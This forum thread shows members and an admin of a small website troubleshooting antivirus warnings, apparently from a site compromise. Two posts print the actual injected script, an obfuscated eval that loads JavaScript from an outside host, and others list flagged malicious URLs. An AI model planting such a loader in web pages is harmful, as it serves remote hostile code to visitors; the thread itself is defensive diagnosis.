IPB

Welcome Guest ( Log In | Register )

 Forum Rules 
 
Reply to this topicStart new topic
> Malware?
BigMistake
post Feb 6 2012, 03:03 PM
Post #1


Obsessive
******

Group: Established Members
Posts: 240
Joined: 21-September 11
Member No.: 17,519
Gender: Male



This is something I got a few hours ago while trying to get to the forums:



Scary stuff!
Go to the top of the page
 
+Quote Post
Mata
post Feb 8 2012, 12:24 PM
Post #2


'Trouble Down Pit' now online!
***************

Group: Admin
Posts: 10,167
Joined: 22-February 03
From: Southern UK
Member No.: 1
Gender: Male



Thanks. I monitor all changes to pages on my domain, so if anything has got through that then it's at a low level that I don't have access to. I've asked my hosting company to run a full scan of my domains to see if they can spot where an exploit has been inserted.


--------------------
Trouble Down Pit: Still updated every Monday and Friday
The Matazone Games blog
The Matazone Shop The Matazone Blog
The Matazone Corset Shop: Snobz corsets at 10% off their recommended price!
Go to the top of the page
 
+Quote Post
Hobbes
post Feb 16 2012, 04:39 PM
Post #3


Advice for the young at heart
************

Group: Moderators
Posts: 2,705
Joined: 26-February 03
From: Essex, UK
Member No.: 33
Gender: Male



I also just had an infection warning pop up from the Avast webshield as I visited the forums main page (.../forums).

Unfortunately, I missed the details, and for some reason the log is empty, so I can't be much more help than that :/


--------------------
Go to the top of the page
 
+Quote Post
Mata
post Feb 27 2012, 08:06 PM
Post #4


'Trouble Down Pit' now online!
***************

Group: Admin
Posts: 10,167
Joined: 22-February 03
From: Southern UK
Member No.: 1
Gender: Male



Thanks - I've bumped the host admins again.


--------------------
Trouble Down Pit: Still updated every Monday and Friday
The Matazone Games blog
The Matazone Shop The Matazone Blog
The Matazone Corset Shop: Snobz corsets at 10% off their recommended price!
Go to the top of the page
 
+Quote Post
Hobbes
post Mar 2 2012, 12:59 PM
Post #5


Advice for the young at heart
************

Group: Moderators
Posts: 2,705
Joined: 26-February 03
From: Essex, UK
Member No.: 33
Gender: Male



Avast picked up this today upon opening the main forum page:

Object: http://wtgrvwohvgusoire.nl.ai/main.php?page=300c6519e5f2b0af
Infection: JS:Downloader-gen@bhv [Expl]
Process: C:\Program Files\Internet Explorer\iexplore.exe


--------------------
Go to the top of the page
 
+Quote Post
Mata
post Mar 17 2012, 04:00 PM
Post #6


'Trouble Down Pit' now online!
***************

Group: Admin
Posts: 10,167
Joined: 22-February 03
From: Southern UK
Member No.: 1
Gender: Male



Thanks... But I'm really not sure what to do. We've scanned the enitre site directory and the database, so there isn't anywhere else to look.

I do occasionally get people trying SQL injection hacks on my database - this generates an error log in which the SQL can remain and this can be used as an active script if the hacker knows where the error log will be stored. I've got file monitoring set up on my whole site that tells me when one of those logs is created and I go and delete them as soon as I can (less than 24 hours) and during that time no further alterations are made to my site (they would be picked up by the scanner). I don't think there is any way that these logs could be generating the problem you're seeing, but it's the only thing I can think of.

If you get another one, could you please open up the source code for the page you are viewing (this is right-click 'View page source' in Firefox, I don't remember it in IE) and do a search (Ctrl+F) to find where the code is being generated on the page - I'm wondering if perhaps someone has got a link to an avatar where the avatar page has been hacked, or something weird like that... Or perhaps someone has created a username that is read as code by the page and tries to execute a script... I'm really stumped for ideas and I'll need your help on this because I've never seen the error. If you can't find the problem, could you save the file and send it to my mata@ [this domain] address please and I'll see if there's anything in there that lets me work out what's going on.

Thanks!


--------------------
Trouble Down Pit: Still updated every Monday and Friday
The Matazone Games blog
The Matazone Shop The Matazone Blog
The Matazone Corset Shop: Snobz corsets at 10% off their recommended price!
Go to the top of the page
 
+Quote Post
BigMistake
post Mar 17 2012, 08:41 PM
Post #7


Obsessive
******

Group: Established Members
Posts: 240
Joined: 21-September 11
Member No.: 17,519
Gender: Male



QUOTE (Mata @ Mar 17 2012, 05:00 PM) *
Thanks... But I'm really not sure what to do. We've scanned the enitre site directory and the database, so there isn't anywhere else to look.

I do occasionally get people trying SQL injection hacks on my database - this generates an error log in which the SQL can remain and this can be used as an active script if the hacker knows where the error log will be stored. I've got file monitoring set up on my whole site that tells me when one of those logs is created and I go and delete them as soon as I can (less than 24 hours) and during that time no further alterations are made to my site (they would be picked up by the scanner). I don't think there is any way that these logs could be generating the problem you're seeing, but it's the only thing I can think of.

If you get another one, could you please open up the source code for the page you are viewing (this is right-click 'View page source' in Firefox, I don't remember it in IE) and do a search (Ctrl+F) to find where the code is being generated on the page - I'm wondering if perhaps someone has got a link to an avatar where the avatar page has been hacked, or something weird like that... Or perhaps someone has created a username that is read as code by the page and tries to execute a script... I'm really stumped for ideas and I'll need your help on this because I've never seen the error. If you can't find the problem, could you save the file and send it to my mata@ [this domain] address please and I'll see if there's anything in there that lets me work out what's going on.

Thanks!


It hasn't happened to me since then, maybe some temporary XSS?
Go to the top of the page
 
+Quote Post
Hobbes
post Apr 16 2012, 07:13 AM
Post #8


Advice for the young at heart
************

Group: Moderators
Posts: 2,705
Joined: 26-February 03
From: Essex, UK
Member No.: 33
Gender: Male



This came up this morning on the main forum page:

URL: http://laykz.tetuku.com/images.php?t
Process: file://C:\Program Files (x86)\Internet E...
Infection: al

Unfortunately I clicked away before I viewed the source. I did go 'back' to the page, but I'm not sure whether it would show it up or not. I took a look through the source but didn't find anything unusual except a batch of URL code which, when decoded, is a javascript. It doesn't look malicious though, but does have a website reference which I don't see in any advertising or anything? It's probably entirely normal (as I don't really have any real experience with javascript beyond 'Hello World') but I'll post the info here anyway. I reloaded the page and the code is still there. I only really query it because it looks unusual as it's in URL encoded text. *shrugs*

It was at line 2024:

CODE
<script type="text/javascript">document.write(unescape('<script%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%70%2C%61%2C%63%2C%6B%2C%65%2C%72%29%7B%65%3D%66%75%6E%63%74%69%6F%6E%28%63%29%7B%72%65%74%75%72%6E%20%63%2E%74%6F%53%74%72%69%6E%67%28%61%29%7D%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%63%2D%2D%29%72%5B%65%28%63%29%5D%3D%6B%5B%63%5D%7C%7C%65%28%63%29%3B%6B%3D%5B%66%75%6E%63%74%69%6F%6E%28%65%29%7B%72%65%74%75%72%6E%20%72%5B%65%5D%7D%5D%3B%65%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%72%65%74%75%72%6E%27%5C%5C%77%2B%27%7D%3B%63%3D%31%7D%3B%77%68%69%6C%65%28%63%2D%2D%29%69%66%28%6B%5B%63%5D%29%70%3D%70%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%27%5C%5C%62%27%2B%65%28%63%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%6B%5B%63%5D%29%3B%72%65%74%75%72%6E%20%70%7D%28%27%31%2E%32%28%5C%27%3C%30%20%33%3D%22%34%2F%35%22%20%36%3D%22%37%3A%2F%2F%38%2E%39%2E%61%2F%62%2F%63%2F%64%2E%65%22%3E%3C%2F%30%3E%5C%27%29%27%2C%31%35%2C%31%35%2C%27%73%63%72%69%70%74%7C%64%6F%63%75%6D%65%6E%74%7C%77%72%69%74%65%7C%74%79%70%65%7C%74%65%78%74%7C%6A%61%76%61%73%63%72%69%70%74%7C%73%72%63%7C%68%74%74%70%7C%67%6F%62%75%79%6C%6F%63%61%6C%7C%63%6F%6D%7C%61%75%7C%63%6F%6D%70%6F%6E%65%6E%74%73%7C%63%6F%6D%5F%63%6E%74%7C%63%6E%74%7C%6A%73%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29%3C%2F%73%63%72%69%70%74%3E'))</script>


Decoded it reads:

CODE
<script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1.2(\'<0 3="4/5" 6="7://8.9.a/b/c/d.e"></0>\')',15,15,'script|document|write|type|text|javascript|src|http|gobuylocal|com|au|components|com_cnt|cnt|js'.split('|'),0,{}))</script>')


I don't really know what gobuylocal stuff is? Again, it doesn't look overly malicious, but I just don't get why it is there?


--------------------
Go to the top of the page
 
+Quote Post
CrazyFooIAintGet...
post Apr 17 2012, 08:50 AM
Post #9


Has been kidnapped by gerbils and forced to post on here repeatedly
***********

Group: Established Members
Posts: 1,088
Joined: 18-September 03
From: London
Member No.: 606
Gender: Female



It's evaluating some obfuscated code.

Looks like it injects another script into the page.

CODE
<script type="text/javascript">
eval(
    function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}(
                '1.2(\'<0 3="4/5" 6="7://8.9.a/b/c/d.e"></0>\')',
        15,
        15,
        'script|document|write|type|text|javascript|src|http|gobuylocal|com|au|components|com_cnt|cnt|js'.split('|'), // this doesn't look good.
        0,
        {}
    )

)
</script>


--------------------
Kung fu fighting from 25th April 2010
Go to the top of the page
 
+Quote Post
Mata
post Apr 27 2012, 06:29 PM
Post #10


'Trouble Down Pit' now online!
***************

Group: Admin
Posts: 10,167
Joined: 22-February 03
From: Southern UK
Member No.: 1
Gender: Male



Sorry, I didn't see this message when you first posted it.

I think what's happening is that someone is using an injection method through the error logging procedure of the forums. When the log is created, it records the dodgy code, then somehow that code can be run. Naturally, I delete the log as soon as I see it, but that's not instantly.

When I get back from holiday I think I'm going to have to stump up a couple of hundred euros to get someone to update the forum software and probably transfer all of the data onto a new open-source forum. It's a heck of a job, but the modern software will be more secure against this kind of thing as well as being easier to update... It's just going to cost a lot sad.gif


--------------------
Trouble Down Pit: Still updated every Monday and Friday
The Matazone Games blog
The Matazone Shop The Matazone Blog
The Matazone Corset Shop: Snobz corsets at 10% off their recommended price!
Go to the top of the page
 
+Quote Post
BigMistake
post Apr 27 2012, 07:32 PM
Post #11


Obsessive
******

Group: Established Members
Posts: 240
Joined: 21-September 11
Member No.: 17,519
Gender: Male



QUOTE (Mata @ Apr 27 2012, 08:29 PM) *
Sorry, I didn't see this message when you first posted it.

I think what's happening is that someone is using an injection method through the error logging procedure of the forums. When the log is created, it records the dodgy code, then somehow that code can be run. Naturally, I delete the log as soon as I see it, but that's not instantly.

When I get back from holiday I think I'm going to have to stump up a couple of hundred euros to get someone to update the forum software and probably transfer all of the data onto a new open-source forum. It's a heck of a job, but the modern software will be more secure against this kind of thing as well as being easier to update... It's just going to cost a lot sad.gif


Are you sure you need to dish out that kind of money? I'm not sure how the forum is set up but I'd imagine it involves a database. Couldn't you use the current database when trying out new forum software?
Go to the top of the page
 
+Quote Post
CrazyFooIAintGet...
post Apr 28 2012, 08:27 AM
Post #12


Has been kidnapped by gerbils and forced to post on here repeatedly
***********

Group: Established Members
Posts: 1,088
Joined: 18-September 03
From: London
Member No.: 606
Gender: Female



You need to import everything into the new format though, which is going to be difficult if there isn't already a built in tool for that.

You could just archive the current forum and start over, but everyone would need to create new accounts.


--------------------
Kung fu fighting from 25th April 2010
Go to the top of the page
 
+Quote Post
Mata
post May 11 2012, 09:38 AM
Post #13


'Trouble Down Pit' now online!
***************

Group: Admin
Posts: 10,167
Joined: 22-February 03
From: Southern UK
Member No.: 1
Gender: Male



Ouch. No, I'd rather not archive everything.

Yes, the problem comes in that there aren't automatic updaters or converters. If I get it all moved to modern software then I should be able to do that in the future, but this time I'll have to bite the bullet and get someone to do it the hard way.


--------------------
Trouble Down Pit: Still updated every Monday and Friday
The Matazone Games blog
The Matazone Shop The Matazone Blog
The Matazone Corset Shop: Snobz corsets at 10% off their recommended price!
Go to the top of the page
 
+Quote Post

Reply to this topicStart new topic
1 User(s) are reading this topic (1 Guests and 0 Anonymous Users)
0 Members:

 



Lo-Fi Version Time is now: 22nd July 2014 - 11:37 PM
Use these links if you're going to shop at Amazon and a percentage of what you spend goes towards helping this site!